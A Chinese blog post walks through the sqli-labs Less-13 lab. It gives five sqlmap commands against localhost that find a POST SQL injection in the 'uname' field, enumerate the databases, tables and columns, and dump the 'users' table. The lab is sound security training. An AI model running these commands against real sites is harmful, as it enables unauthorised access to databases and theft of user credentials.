sqli-labs-Less-13自动化注入方法

sqli-labs 实验记录

Less-13

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-13/?id=1 --batch --forms

--batch 表示采用默认参数。
--forms 表示自动提交表单。

查询结果如图所示:存在注入点uname,注入方式为POST,注入类型分别为:error-based,time-based blind; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-13/?id=1 --batch --forms --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有两个,分别为information_schema, security。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-13/?id=1 --batch --forms -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-13/?id=1 --batch --forms -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-13/?id=1 --batch --forms -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
yoothey15 分钟前
MySQL 数据库连接池调优实战
数据库·mysql
江华森38 分钟前
Python 编程快速上手:让繁琐工作自动化 —— 19章全实战笔记
笔记·python·自动化
Mr_Controll39 分钟前
【运动控制——电子凸轮曲线设计(多项式)】
算法·自动化
Tian_Hang1 小时前
Eclipse Mosquitto 安装及介绍
java·运维·服务器·ide·sql·mysql·eclipse
曦尧1 小时前
Terax:轻量级终端优先的 AI 原生开发工作区
ai·自动化
Chockmans1 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
搬砖柯1 小时前
系列12-接口压测怎么做成平台能力?自研 httpx 引擎、分布式 Worker 与 Locust 选型对照
分布式·测试工具·性能优化·开源·自动化·httpx
2603_9552797011 小时前
Cursor + GitOps:自动化运维新姿势
运维·自动化
ai_coder_ai13 小时前
编写自动化脚本,在自己后端服务中使用Open Api进行设备相关操作
java·运维·自动化
南墙上的石头13 小时前
麒麟 V10 重装人大金仓 V8R6 踩坑实录(含 MySQL 兼容模式)
数据库·mysql